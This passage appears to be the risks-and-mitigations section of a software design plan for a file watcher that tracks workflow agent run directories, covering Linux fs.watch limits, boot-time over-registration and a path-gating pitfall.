||||
1. **Non-recursive watch on Linux misses live writes.** `fs.watch` is non-recursive and `{recursive:true}` is unreliable on Linux → per-`wf_<runId>` watchers (§3a-4) are correct, but the 5s full scan must re-`readdir(wfRoot)` to catch *new* run dirs mid-session, and each watcher must be torn down to avoid FSWatcher leaks in 24h runs. Mitigation: explicit per-run-dir registration + verified `dirWatchers` teardown; chokidar (with `CleanupManager`) only in the new run watcher, where `team-watcher` already proves the pattern.
|
||||
2. **Discovery cost / over-registration.** A user with hundreds of historical workflow agents could flood `agentInfo` on boot. Mitigation: the 4h `STARTUP_MAX_FILE_AGE_MS` skip drops old files on the initial scan, the descent only runs when the toggle is on, and `MAX_TRACKED_AGENTS=500` LRU-evicts. Verify boot scan time doesn't regress with the corpus present.
|
||||
3. **Shipping-dead-on-a-gate** (the repo's recurring failure mode — the plan-usage chip shipped dead because injection was gated on `CASES_DIR` while real sessions ran elsewhere). Same trap here if the path/mode gate is wrong (e.g. `projects/*/workflows` instead of `projects/*/*/workflows`, or correlation via the wrong session key). Mitigation: the **mandatory live ultracode end-to-end run** in §8 against a real session's `workingDir`, observing the real SSE event + real DOM cluster — not the at-rest corpus, not unit tests alone.
|
||||